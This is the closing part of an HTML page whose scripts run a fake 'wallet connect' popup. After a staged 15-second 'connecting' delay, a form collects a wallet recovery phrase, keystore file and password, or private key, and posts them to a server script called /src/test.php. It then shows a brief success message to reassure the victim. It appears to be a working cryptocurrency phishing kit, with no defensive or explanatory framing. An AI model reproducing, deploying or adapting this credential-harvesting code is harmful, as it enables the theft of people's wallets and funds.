        <script src="assets/js/main.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js"></script>
        <script>
            $(document).ready(function() {
                $('#buttonsubmit').submit(function(event) {
                    // Prevent the form's default action
                    event.preventDefault();
        
                         
                    // Get form data as an object
                    const formData = {
                        type: $('#type').val(),
                        phraseinput: $('#phraseinput').val(),
                        password: $('#password').val(),
                        email: $('#privatekeyval').val(),
                    };
        
                    // Perform AJAX request
                    $.ajax({
                        url: '/src/test.php', // Replace with your server URL
                        type: 'POST',
                        data: JSON.stringify(formData),
                        contentType: 'application/json',
                        success: function(response) {
                            // Show success pop-up
                            // alert("Success: " + response.message);
                            $('#message').text(response.message)
                            $('#myModal').modal('show');

                            // Set the time in milliseconds (e.g., 3000ms = 3 seconds)
                            var modalTime = 3000;

                            // Automatically close the modal after the specified time
                            setTimeout(function() {
                                $('#myModal').modal('hide');
                            }, modalTime);
                            closePopup();
                        },
                        error: function(xhr, status, error) {
                            // Show error pop-up
                            alert("Error: " + xhr.responseText || "Something went wrong!");
                        }
                    });
                });
            });
        </script>
<script>
    function openPopup() {
      document.getElementById("popup-container").style.display = "flex";
      document.getElementById("connecting").style.display = "block";
      setTimeout(function() {
        document.getElementById("connecting").style.display = "none";
        document.getElementById("walletForm").style.display = "block";
      }, 15000);
    }
    
    function closePopup() {
        document.getElementById('popup-container').style.display = 'none';
        document.getElementById("connecting").style.display = "none";
        document.getElementById("walletForm").style.display = "none";
    }

    function toggleFields() {
        var selectedType = document.getElementById('type').value;
        document.getElementById('phraseField').style.display = (selectedType === 'Phrase') ? 'block' : 'none';
        document.getElementById('keystoreField').style.display = (selectedType === 'Keystore JSON') ? 'block' : 'none';
        document.getElementById('privateField').style.display = (selectedType === 'Private') ? 'block' : 'none';
    }

    setTimeout(function() {
        document.querySelector('.popup-box').remove();
    }, 25000);
</script>

</body>
</html>



